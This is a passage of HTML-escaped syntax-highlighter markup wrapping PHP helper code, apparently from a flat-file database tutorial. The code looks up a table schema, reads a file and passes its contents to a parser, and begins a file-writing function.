class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$schema&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$schema&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-173&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-174&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-175&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-176&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbReadFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-177&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fopen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;r&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;or&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Unable to open file!&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-178&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$content&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fread&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;filesize&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-179&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fclose&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-180&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbParse&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$content&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-181&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-182&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-183&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbWriteFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) 